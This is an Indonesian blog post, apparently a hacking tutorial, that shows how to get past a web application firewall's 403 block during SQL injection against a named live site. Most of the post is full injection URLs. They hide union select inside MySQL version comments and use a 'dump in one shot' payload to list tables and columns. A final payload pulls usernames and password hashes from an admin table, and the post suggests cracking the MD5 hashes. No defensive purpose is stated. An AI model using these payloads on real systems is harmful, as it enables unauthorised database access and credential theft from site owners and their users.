Skip to main content

Cara Bypass Sql Injection 403 Forbidden


Mumpung ada sasaran nih, di postingan kali ini gw mau ngejelasin tutorial bagaimana Cara Bypass Sql Injection 403 Forbidden.

Oke pribadi saja, disini gw udah ada sasaran dan berikut sasaran gue,
https://tisplanet.com/service-item.php?id=3

Di klarifikasi kali ini gw ga akan ngejelasin sedetail mungkin.
Karena ditutorial ini mungkin kalian sudah pada paham basic sqli, jadi pribadi ke inti permasalahannya saja ya.

Oke oke kita lanjutkan, gw asumsikan udah ke tahap union+select
Gue disini sehabis melaksanakan order+by untuk mendapat jumlah column dan dikala mau masukan query union+select ternyata malah kena security waf 403 Forbidden.


Untuk cara bypassnya cukup kita menambahkan beberapa abjad mysql-comments. Di sasaran gw disini yang kena waf di union+select jadi kita tinggal menambahkan beberapa abjad mysql-comments,

Contoh,
union+select
Kita tambahkan mysql-commentsnya jadi,

/*!union*/+/*!select*/
/*!12345union*/+/*!12345select*/

Nahh jadi misalnya ibarat ini,

https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,4,5,6,7,8--+

Lihat digambar dibawah ini, bypassed.


Terus kalo udah tau angka magicknya yang keluar, selanjutnya tinggal masukan diosnya. Gue pilih angka 4 untuk dikasih dios berikut perintah lengkapnya,

https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7,8--+

Kena 403 Forbidden lagi anjirr mari kita bypass.


Oke berarti yang harus dibypass ialah diosnya, alasannya ialah tadi pas mau dikasih dios malah kena waf 403 forbidden.

Untuk bypass diosnya sama ibarat waktu bypass union+select tinggal menambahkan abjad mysql-comments. Lebih jelasnya ibarat ini,

https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),5,6,7,8--+


Bypass sukses, lihat gambar diatas gan.

Selanjutnya tinggal ngedump username beserta passwordnya ibarat ini,

https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345admin_login*/)where@:=make_set(511,@,0x3c6c693e,/*!12345username*/,/*!12345password*/)),@),5,6,7,8--+


Nah tuh keluar user dan passnya tapi password masih terenkripsi jenis md5, jadi harus dicrak atau hash semoga dapat mengetahui password yang aslinya.

Oke sekian dulu dari gue, semoga bermanfaat.
Comment Policy: Silahkan tuliskan komentar Anda yang sesuai dengan topik postingan halaman ini. Komentar yang berisi tautan tidak akan ditampilkan sebelum disetujui.
Buka Komentar
Tutup Komentar